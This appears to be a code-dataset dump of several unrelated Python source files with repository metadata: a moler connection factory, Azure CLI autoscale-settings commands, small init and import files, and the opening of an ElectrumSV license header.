import moler.config.connections as connection_cfg
from moler.threaded_moler_connection import ThreadedMolerConnection
def get_connection(name=None, io_type=None, variant=None, **constructor_kwargs):
if (not name) and (not io_type):
err_msg = "Provide either 'name' or 'io_type' parameter (none given)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
if name and io_type:
err_msg = "Use either 'name' or 'io_type' parameter (not both)"
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AssertionError(err_msg)
io_type, constructor_kwargs = _try_take_named_connection_params(name, io_type, **constructor_kwargs)
variant = _try_select_io_type_variant(io_type, variant)
io_conn = _try_get_connection_with_name(io_type, variant, **constructor_kwargs)
return io_conn
class ConnectionFactory(object):
_constructors_registry = {}
@classmethod
def register_construction(cls, io_type, variant, constructor):
if not callable(constructor):
err_msg = "constructor must be callable not {}".format(constructor)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise ValueError(err_msg)
cls._constructors_registry[(io_type, variant)] = constructor
@classmethod
def get_connection(cls, io_type, variant, **constructor_kwargs):
key = (io_type, variant)
if key not in cls._constructors_registry:
err_msg = "No constructor registered for [{}] connection".format(key)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
constructor = cls._constructors_registry[key]
connection = constructor(**constructor_kwargs)
return connection
@classmethod
def available_variants(cls, io_type):
available = [vt for io, vt in cls._constructors_registry if io == io_type]
return available
def _moler_logger_log(level, msg):
logger = logging.getLogger('moler')
logger.log(level, msg)
def _try_take_named_connection_params(name, io_type, **constructor_kwargs):
if name:
if name not in connection_cfg.named_connections:
whats_wrong = "was not defined inside configuration"
err_msg = "Connection named '{}' {}".format(name, whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
org_kwargs = constructor_kwargs
io_type, constructor_kwargs = connection_cfg.named_connections[name]
constructor_kwargs['name'] = name
for argname in org_kwargs:
if argname not in constructor_kwargs:
constructor_kwargs[argname] = org_kwargs[argname]
return io_type, constructor_kwargs
def _try_select_io_type_variant(io_type, variant):
if (io_type == 'terminal') and (platform.system() == 'Windows'):
whats_wrong = "No '{}' connection available on Windows".format(io_type)
fix = "try using 'sshshell' connection instead"
err_msg = "{} ({})".format(whats_wrong, fix)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise AttributeError(err_msg)
if variant is None:
if io_type in connection_cfg.default_variant:
variant = connection_cfg.default_variant[io_type]
if variant is None:
whats_wrong = "No variant selected"
selection_method = "directly or via configuration"
err_msg = "{} ({}) for '{}' connection".format(whats_wrong,
selection_method,
io_type)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
if variant not in ConnectionFactory.available_variants(io_type):
whats_wrong = "is not registered inside ConnectionFactory"
err_msg = "'{}' variant of '{}' connection {}".format(variant,
io_type,
whats_wrong)
_moler_logger_log(level=logging.DEBUG, msg=err_msg)
raise KeyError(err_msg)
return variant
def _try_get_connection_with_name(io_type, variant, **constructor_kwargs):
try:
return ConnectionFactory.get_connection(io_type, variant, **constructor_kwargs)
except TypeError as err:
if "unexpected keyword argument 'name'" in str(err):
del constructor_kwargs['name']
return ConnectionFactory.get_connection(io_type, variant,
**constructor_kwargs)
_moler_logger_log(level=logging.DEBUG, msg=repr(err))
raise
connection_cfg.register_builtin_connections(ConnectionFactory, ThreadedMolerConnection)
connection_cfg.set_defaults()
| true
| true
|
1c3ea5491a186402e9d7e441587dc01568439264
| 16,337
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | 1
|
2020-12-12T02:53:24.000Z
|
2020-12-12T02:53:24.000Z
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | 1
|
2021-03-01T19:31:38.000Z
|
2021-03-01T19:31:38.000Z
|
src/azure-cli/azure/cli/command_modules/monitor/operations/autoscale_settings.py
|
digimaun/azure-cli
|
298994660f0fde6863cb45a7c3142141ed10f923
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.log import get_logger
logger = get_logger(__name__)
DEFAULT_PROFILE_NAME = 'default'
def scaffold_autoscale_settings_parameters(client): # pylint: disable=unused-argument
"""Scaffold fully formed autoscale-settings' parameters as json template """
import os.path
from knack.util import CLIError
from azure.cli.core.util import get_file_json
# Autoscale settings parameter scaffold file path
curr_dir = os.path.dirname(os.path.realpath(__file__))
autoscale_settings_parameter_file_path = os.path.join(
curr_dir, 'autoscale-parameters-template.json')
if not os.path.exists(autoscale_settings_parameter_file_path):
raise CLIError('File {} not found.'.format(autoscale_settings_parameter_file_path))
return get_file_json(autoscale_settings_parameter_file_path)
# pylint: disable=too-many-locals
def autoscale_create(client, resource, count, autoscale_name=None, resource_group_name=None,
min_count=None, max_count=None, location=None, tags=None, disabled=None,
actions=None, email_administrator=None, email_coadministrators=None):
from azure.mgmt.monitor.models import (
AutoscaleSettingResource, AutoscaleProfile, AutoscaleNotification, ScaleCapacity,
EmailNotification, WebhookNotification)
if not autoscale_name:
from msrestazure.tools import parse_resource_id
autoscale_name = parse_resource_id(resource)['name']
min_count = min_count or count
max_count = max_count or count
default_profile = AutoscaleProfile(
name=DEFAULT_PROFILE_NAME,
capacity=ScaleCapacity(default=count, minimum=min_count, maximum=max_count),
rules=[]
)
notification = AutoscaleNotification(
email=EmailNotification(
custom_emails=[],
send_to_subscription_administrator=email_administrator,
send_to_subscription_co_administrators=email_coadministrators
),
webhooks=[]
)
for action in actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
autoscale = AutoscaleSettingResource(
location=location,
profiles=[default_profile],
tags=tags,
notifications=[notification],
enabled=not disabled,
autoscale_setting_resource_name=autoscale_name,
target_resource_uri=resource
)
if not (min_count == count and max_count == count):
logger.warning('Follow up with `az monitor autoscale rule create` to add scaling rules.')
return client.create_or_update(resource_group_name, autoscale_name, autoscale)
# pylint: disable=too-many-locals
def autoscale_update(instance, count=None, min_count=None, max_count=None, tags=None, enabled=None,
add_actions=None, remove_actions=None, email_administrator=None,
email_coadministrators=None):
import json
from azure.mgmt.monitor.models import EmailNotification, WebhookNotification
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
if tags is not None:
instance.tags = tags
if enabled is not None:
instance.enabled = enabled
if any([count, min_count, max_count]):
# resolve the interrelated aspects of capacity
default_profile, _ = build_autoscale_profile(instance)
curr_count = default_profile.capacity.default
curr_min = default_profile.capacity.minimum
curr_max = default_profile.capacity.maximum
is_fixed_count = curr_count == curr_min and curr_count == curr_max
# check for special case where count is used to indicate fixed value and only
# count is updated
if count is not None and is_fixed_count and min_count is None and max_count is None:
min_count = count
max_count = count
count = curr_count if count is None else count
min_count = curr_min if min_count is None else min_count
max_count = curr_max if max_count is None else max_count
# There may be multiple "default" profiles. All need to updated.
for profile in instance.profiles:
if profile.fixed_date:
continue
if profile.recurrence:
try:
# portal denotes the "default" pairs by using a JSON string for their name
# so if it can be decoded, we know this is a default profile
json.loads(profile.name)
except ValueError:
continue
profile.capacity.default = count
profile.capacity.minimum = min_count
profile.capacity.maximum = max_count
if not instance.notifications:
return instance
notification = next(x for x in instance.notifications if x.operation.lower() == 'scale')
# process removals
if remove_actions is not None:
removed_emails, removed_webhooks = _parse_action_removals(remove_actions)
notification.email.custom_emails = \
[x for x in notification.email.custom_emails if x not in removed_emails]
notification.webhooks = \
[x for x in notification.webhooks if x.service_uri not in removed_webhooks]
# process additions
for action in add_actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
if email_administrator is not None:
notification.email.send_to_subscription_administrator = email_administrator
if email_coadministrators is not None:
notification.email.send_to_subscription_co_administrators = email_coadministrators
return instance
def _parse_action_removals(actions):
""" Separates the combined list of keys to remove into webhooks and emails. """
flattened = list({x for sublist in actions for x in sublist})
emails = []
webhooks = []
for item in flattened:
if item.startswith('http://') or item.startswith('https://'):
webhooks.append(item)
else:
emails.append(item)
return emails, webhooks
def _apply_copy_rules(autoscale_settings, new_profile, copy_rules):
if copy_rules:
copy_profile = next(x for x in autoscale_settings.profiles if x.name == copy_rules)
if copy_profile:
new_profile.rules = copy_profile.rules[:]
def _create_fixed_profile(autoscale_settings, profile_name, start, end, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import AutoscaleProfile, TimeWindow
if not (start and end):
from knack.util import CLIError
raise CLIError('usage error: fixed schedule: --start DATETIME --end DATETIME')
profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
fixed_date=TimeWindow(start=start, end=end, time_zone=timezone),
)
_apply_copy_rules(autoscale_settings, profile, copy_rules)
autoscale_settings.profiles.append(profile)
# pylint: disable=unused-argument
def _create_recurring_profile(autoscale_settings, profile_name, start, end, recurrence, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import (
AutoscaleProfile, Recurrence, RecurrentSchedule)
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile, validate_autoscale_profile
import dateutil
from datetime import time
import json
def _build_recurrence(base, time):
recurrence = Recurrence(
frequency=base.frequency,
schedule=RecurrentSchedule(
time_zone=base.schedule.time_zone,
days=base.schedule.days,
hours=[time.hour],
minutes=[time.minute]
)
)
return recurrence
start_time = dateutil.parser.parse(start).time() if start else time(hour=0, minute=0)
end_time = dateutil.parser.parse(end).time() if end else time(hour=23, minute=59)
default_profile, autoscale_profile = build_autoscale_profile(autoscale_settings)
validate_autoscale_profile(autoscale_profile, start_time, end_time, recurrence)
start_profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
recurrence=_build_recurrence(recurrence, start_time)
)
_apply_copy_rules(autoscale_settings, start_profile, copy_rules)
end_profile = AutoscaleProfile(
name=json.dumps({'name': default_profile.name, 'for': profile_name}),
capacity=default_profile.capacity,
rules=default_profile.rules,
recurrence=_build_recurrence(recurrence, end_time)
)
autoscale_settings.profiles.append(start_profile)
autoscale_settings.profiles.append(end_profile)
def autoscale_profile_create(client, autoscale_name, resource_group_name, profile_name,
count, timezone, start=None, end=None, copy_rules=None, min_count=None,
max_count=None, recurrence=None):
from azure.mgmt.monitor.models import ScaleCapacity
autoscale_settings = client.get(resource_group_name, autoscale_name)
capacity = ScaleCapacity(
default=count,
minimum=min_count or count,
maximum=max_count or count
)
if recurrence:
_create_recurring_profile(
autoscale_settings, profile_name, start, end, recurrence, capacity, copy_rules, timezone)
else:
_create_fixed_profile(
autoscale_settings, profile_name, start, end, capacity, copy_rules, timezone)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_list(cmd, client, autoscale_name, resource_group_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
return autoscale_settings.profiles
def autoscale_profile_list_timezones(cmd, client, offset=None, search_query=None):
from azure.cli.command_modules.monitor._autoscale_util import AUTOSCALE_TIMEZONES
timezones = []
for zone in AUTOSCALE_TIMEZONES:
if search_query and search_query.lower() not in zone['name'].lower():
continue
if offset and offset not in zone['offset']:
continue
timezones.append(zone)
return timezones
def autoscale_profile_show(cmd, client, autoscale_name, resource_group_name, profile_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_delete(cmd, client, autoscale_name, resource_group_name, profile_name):
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
import json
autoscale_settings = client.get(resource_group_name, autoscale_name)
default_profile, _ = build_autoscale_profile(autoscale_settings)
def _should_retain_profile(profile):
name = profile.name
try:
name = json.loads(profile.name)['for']
except ValueError:
pass
return name.lower() != profile_name.lower()
autoscale_settings.profiles = [x for x in autoscale_settings.profiles if _should_retain_profile(x)]
# if we removed the last "default" of a recurring pair, we need to preserve it
new_default, _ = build_autoscale_profile(autoscale_settings)
if not new_default:
autoscale_settings.profiles.append(default_profile)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_create(cmd, client, autoscale_name, resource_group_name, condition,
scale, profile_name=DEFAULT_PROFILE_NAME, cooldown=5, source=None,
timegrain="avg 1m"):
from azure.mgmt.monitor.models import ScaleRule, ScaleAction, ScaleDirection
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
condition.metric_resource_uri = source or autoscale_settings.target_resource_uri
condition.statistic = timegrain.statistic
condition.time_grain = timegrain.time_grain
rule = ScaleRule(
metric_trigger=condition,
scale_action=ScaleAction(
direction=scale.direction,
type=scale.type,
cooldown='PT{}M'.format(cooldown),
value=scale.value)
)
profile.rules.append(rule)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
# determine if there are unbalanced rules
scale_out_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.increase])
scale_in_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.decrease])
if scale_out_rule_count and not scale_in_rule_count:
logger.warning("Profile '%s' has rules to scale out but none to scale in. "
"Recommend creating at least 1 scale in rule.", profile_name)
elif scale_in_rule_count and not scale_out_rule_count:
logger.warning("Profile '%s' has rules to scale in but none to scale out. "
"Recommend creating at least 1 scale out rule.", profile_name)
return rule
def autoscale_rule_list(cmd, client, autoscale_name, resource_group_name, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile_names = [x.name for x in autoscale_settings.profiles]
if profile_name not in profile_names:
from knack.util import CLIError
raise CLIError('Profile name is invalid. Please check the existence of the profile.')
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
index = 0
# we artificially add indices to the rules so the user can target them with the remove command
for rule in profile.rules:
setattr(rule, 'index', index)
index += 1
return profile.rules
def autoscale_rule_delete(cmd, client, autoscale_name, resource_group_name, index, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
# delete the indices provided
if '*' in index:
profile.rules = []
else:
for i in index:
del profile.rules[int(i)]
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_copy(cmd, client, autoscale_name, resource_group_name, dest_profile, index,
source_profile=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
src_profile = next(x for x in autoscale_settings.profiles if x.name == source_profile)
dst_profile = next(x for x in autoscale_settings.profiles if x.name == dest_profile)
if '*' in index:
dst_profile.rules = src_profile.rules
else:
for i in index:
dst_profile.rules.append(src_profile.rules[int(i)])
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
| 43.334218
| 118
| 0.700863
|
from knack.log import get_logger
logger = get_logger(__name__)
DEFAULT_PROFILE_NAME = 'default'
def scaffold_autoscale_settings_parameters(client):
import os.path
from knack.util import CLIError
from azure.cli.core.util import get_file_json
curr_dir = os.path.dirname(os.path.realpath(__file__))
autoscale_settings_parameter_file_path = os.path.join(
curr_dir, 'autoscale-parameters-template.json')
if not os.path.exists(autoscale_settings_parameter_file_path):
raise CLIError('File {} not found.'.format(autoscale_settings_parameter_file_path))
return get_file_json(autoscale_settings_parameter_file_path)
def autoscale_create(client, resource, count, autoscale_name=None, resource_group_name=None,
min_count=None, max_count=None, location=None, tags=None, disabled=None,
actions=None, email_administrator=None, email_coadministrators=None):
from azure.mgmt.monitor.models import (
AutoscaleSettingResource, AutoscaleProfile, AutoscaleNotification, ScaleCapacity,
EmailNotification, WebhookNotification)
if not autoscale_name:
from msrestazure.tools import parse_resource_id
autoscale_name = parse_resource_id(resource)['name']
min_count = min_count or count
max_count = max_count or count
default_profile = AutoscaleProfile(
name=DEFAULT_PROFILE_NAME,
capacity=ScaleCapacity(default=count, minimum=min_count, maximum=max_count),
rules=[]
)
notification = AutoscaleNotification(
email=EmailNotification(
custom_emails=[],
send_to_subscription_administrator=email_administrator,
send_to_subscription_co_administrators=email_coadministrators
),
webhooks=[]
)
for action in actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
autoscale = AutoscaleSettingResource(
location=location,
profiles=[default_profile],
tags=tags,
notifications=[notification],
enabled=not disabled,
autoscale_setting_resource_name=autoscale_name,
target_resource_uri=resource
)
if not (min_count == count and max_count == count):
logger.warning('Follow up with `az monitor autoscale rule create` to add scaling rules.')
return client.create_or_update(resource_group_name, autoscale_name, autoscale)
def autoscale_update(instance, count=None, min_count=None, max_count=None, tags=None, enabled=None,
add_actions=None, remove_actions=None, email_administrator=None,
email_coadministrators=None):
import json
from azure.mgmt.monitor.models import EmailNotification, WebhookNotification
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
if tags is not None:
instance.tags = tags
if enabled is not None:
instance.enabled = enabled
if any([count, min_count, max_count]):
default_profile, _ = build_autoscale_profile(instance)
curr_count = default_profile.capacity.default
curr_min = default_profile.capacity.minimum
curr_max = default_profile.capacity.maximum
is_fixed_count = curr_count == curr_min and curr_count == curr_max
if count is not None and is_fixed_count and min_count is None and max_count is None:
min_count = count
max_count = count
count = curr_count if count is None else count
min_count = curr_min if min_count is None else min_count
max_count = curr_max if max_count is None else max_count
for profile in instance.profiles:
if profile.fixed_date:
continue
if profile.recurrence:
try:
json.loads(profile.name)
except ValueError:
continue
profile.capacity.default = count
profile.capacity.minimum = min_count
profile.capacity.maximum = max_count
if not instance.notifications:
return instance
notification = next(x for x in instance.notifications if x.operation.lower() == 'scale')
if remove_actions is not None:
removed_emails, removed_webhooks = _parse_action_removals(remove_actions)
notification.email.custom_emails = \
[x for x in notification.email.custom_emails if x not in removed_emails]
notification.webhooks = \
[x for x in notification.webhooks if x.service_uri not in removed_webhooks]
for action in add_actions or []:
if isinstance(action, EmailNotification):
for email in action.custom_emails:
notification.email.custom_emails.append(email)
elif isinstance(action, WebhookNotification):
notification.webhooks.append(action)
if email_administrator is not None:
notification.email.send_to_subscription_administrator = email_administrator
if email_coadministrators is not None:
notification.email.send_to_subscription_co_administrators = email_coadministrators
return instance
def _parse_action_removals(actions):
flattened = list({x for sublist in actions for x in sublist})
emails = []
webhooks = []
for item in flattened:
if item.startswith('http://') or item.startswith('https://'):
webhooks.append(item)
else:
emails.append(item)
return emails, webhooks
def _apply_copy_rules(autoscale_settings, new_profile, copy_rules):
if copy_rules:
copy_profile = next(x for x in autoscale_settings.profiles if x.name == copy_rules)
if copy_profile:
new_profile.rules = copy_profile.rules[:]
def _create_fixed_profile(autoscale_settings, profile_name, start, end, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import AutoscaleProfile, TimeWindow
if not (start and end):
from knack.util import CLIError
raise CLIError('usage error: fixed schedule: --start DATETIME --end DATETIME')
profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
fixed_date=TimeWindow(start=start, end=end, time_zone=timezone),
)
_apply_copy_rules(autoscale_settings, profile, copy_rules)
autoscale_settings.profiles.append(profile)
def _create_recurring_profile(autoscale_settings, profile_name, start, end, recurrence, capacity,
copy_rules=None, timezone=None):
from azure.mgmt.monitor.models import (
AutoscaleProfile, Recurrence, RecurrentSchedule)
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile, validate_autoscale_profile
import dateutil
from datetime import time
import json
def _build_recurrence(base, time):
recurrence = Recurrence(
frequency=base.frequency,
schedule=RecurrentSchedule(
time_zone=base.schedule.time_zone,
days=base.schedule.days,
hours=[time.hour],
minutes=[time.minute]
)
)
return recurrence
start_time = dateutil.parser.parse(start).time() if start else time(hour=0, minute=0)
end_time = dateutil.parser.parse(end).time() if end else time(hour=23, minute=59)
default_profile, autoscale_profile = build_autoscale_profile(autoscale_settings)
validate_autoscale_profile(autoscale_profile, start_time, end_time, recurrence)
start_profile = AutoscaleProfile(
name=profile_name,
capacity=capacity,
rules=[],
recurrence=_build_recurrence(recurrence, start_time)
)
_apply_copy_rules(autoscale_settings, start_profile, copy_rules)
end_profile = AutoscaleProfile(
name=json.dumps({'name': default_profile.name, 'for': profile_name}),
capacity=default_profile.capacity,
rules=default_profile.rules,
recurrence=_build_recurrence(recurrence, end_time)
)
autoscale_settings.profiles.append(start_profile)
autoscale_settings.profiles.append(end_profile)
def autoscale_profile_create(client, autoscale_name, resource_group_name, profile_name,
count, timezone, start=None, end=None, copy_rules=None, min_count=None,
max_count=None, recurrence=None):
from azure.mgmt.monitor.models import ScaleCapacity
autoscale_settings = client.get(resource_group_name, autoscale_name)
capacity = ScaleCapacity(
default=count,
minimum=min_count or count,
maximum=max_count or count
)
if recurrence:
_create_recurring_profile(
autoscale_settings, profile_name, start, end, recurrence, capacity, copy_rules, timezone)
else:
_create_fixed_profile(
autoscale_settings, profile_name, start, end, capacity, copy_rules, timezone)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_list(cmd, client, autoscale_name, resource_group_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
return autoscale_settings.profiles
def autoscale_profile_list_timezones(cmd, client, offset=None, search_query=None):
from azure.cli.command_modules.monitor._autoscale_util import AUTOSCALE_TIMEZONES
timezones = []
for zone in AUTOSCALE_TIMEZONES:
if search_query and search_query.lower() not in zone['name'].lower():
continue
if offset and offset not in zone['offset']:
continue
timezones.append(zone)
return timezones
def autoscale_profile_show(cmd, client, autoscale_name, resource_group_name, profile_name):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
return profile
def autoscale_profile_delete(cmd, client, autoscale_name, resource_group_name, profile_name):
from azure.cli.command_modules.monitor._autoscale_util import build_autoscale_profile
import json
autoscale_settings = client.get(resource_group_name, autoscale_name)
default_profile, _ = build_autoscale_profile(autoscale_settings)
def _should_retain_profile(profile):
name = profile.name
try:
name = json.loads(profile.name)['for']
except ValueError:
pass
return name.lower() != profile_name.lower()
autoscale_settings.profiles = [x for x in autoscale_settings.profiles if _should_retain_profile(x)]
new_default, _ = build_autoscale_profile(autoscale_settings)
if not new_default:
autoscale_settings.profiles.append(default_profile)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_create(cmd, client, autoscale_name, resource_group_name, condition,
scale, profile_name=DEFAULT_PROFILE_NAME, cooldown=5, source=None,
timegrain="avg 1m"):
from azure.mgmt.monitor.models import ScaleRule, ScaleAction, ScaleDirection
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
condition.metric_resource_uri = source or autoscale_settings.target_resource_uri
condition.statistic = timegrain.statistic
condition.time_grain = timegrain.time_grain
rule = ScaleRule(
metric_trigger=condition,
scale_action=ScaleAction(
direction=scale.direction,
type=scale.type,
cooldown='PT{}M'.format(cooldown),
value=scale.value)
)
profile.rules.append(rule)
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
scale_out_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.increase])
scale_in_rule_count = len([x for x in profile.rules if x.scale_action.direction == ScaleDirection.decrease])
if scale_out_rule_count and not scale_in_rule_count:
logger.warning("Profile '%s' has rules to scale out but none to scale in. "
"Recommend creating at least 1 scale in rule.", profile_name)
elif scale_in_rule_count and not scale_out_rule_count:
logger.warning("Profile '%s' has rules to scale in but none to scale out. "
"Recommend creating at least 1 scale out rule.", profile_name)
return rule
def autoscale_rule_list(cmd, client, autoscale_name, resource_group_name, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile_names = [x.name for x in autoscale_settings.profiles]
if profile_name not in profile_names:
from knack.util import CLIError
raise CLIError('Profile name is invalid. Please check the existence of the profile.')
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
index = 0
for rule in profile.rules:
setattr(rule, 'index', index)
index += 1
return profile.rules
def autoscale_rule_delete(cmd, client, autoscale_name, resource_group_name, index, profile_name=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
profile = next(x for x in autoscale_settings.profiles if x.name == profile_name)
if '*' in index:
profile.rules = []
else:
for i in index:
del profile.rules[int(i)]
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
def autoscale_rule_copy(cmd, client, autoscale_name, resource_group_name, dest_profile, index,
source_profile=DEFAULT_PROFILE_NAME):
autoscale_settings = client.get(resource_group_name, autoscale_name)
src_profile = next(x for x in autoscale_settings.profiles if x.name == source_profile)
dst_profile = next(x for x in autoscale_settings.profiles if x.name == dest_profile)
if '*' in index:
dst_profile.rules = src_profile.rules
else:
for i in index:
dst_profile.rules.append(src_profile.rules[int(i)])
autoscale_settings = client.create_or_update(resource_group_name, autoscale_name, autoscale_settings)
| true
| true
|
1c3ea55a9729d4899c05e8ba4f39867721eb3eb4
| 1,468
|
py
|
Python
|
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 12
|
2019-08-20T06:27:15.000Z
|
2022-02-15T05:26:58.000Z
|
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | null | null | null |
Src/Nets/KeyPoint/__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 7
|
2019-08-26T03:31:26.000Z
|
2022-03-19T06:17:39.000Z
|
# Copyright 2020 winshare
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************** #
# #
# ::: :::::::: #
# __init__.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: winshare <tanwenxuan@live.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/03/11 19:48:45 by winshare #+# #+# #
# Updated: 2020/03/11 19:48:45 by winshare ### ########.fr #
# #
# **************************************************************************** #
| 54.37037
| 80
| 0.366485
| true
| true
|
|
1c3ea56d42d3313abd71a2446b8e9d75e9fcc94c
| 96
|
py
|
Python
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 29
|
2020-12-15T07:17:53.000Z
|
2022-03-28T03:04:21.000Z
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 12
|
2021-01-07T02:31:50.000Z
|
2022-03-29T02:19:37.000Z
|
cruw/eval/__init__.py
|
kanishkaisreal/cruw-devkit
|
81e2da7de79b112d78c786d7d4be2504704368c7
|
[
"MIT"
] | 11
|
2021-01-13T03:39:57.000Z
|
2022-03-04T04:57:34.000Z
|
from .rod.eval_rod2021 import evaluate_rod2021
from .rod.eval_rodnet import evaluate_rodnet_seq
| 32
| 48
| 0.875
|
from .rod.eval_rod2021 import evaluate_rod2021
from .rod.eval_rodnet import evaluate_rodnet_seq
| true
| true
|
1c3ea5bd4e61f72df060889b3ddac34e67626514
| 10,647
|
py
|
Python
|
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | 1
|
2021-12-28T10:52:11.000Z
|
2021-12-28T10:52:11.000Z
|
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | null | null | null |
electrumsv/gui/qt/paytoedit.py
|
bitcartel/electrumsv
|
009ea3675292a26a5a197fc8602dafca5453f9c5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
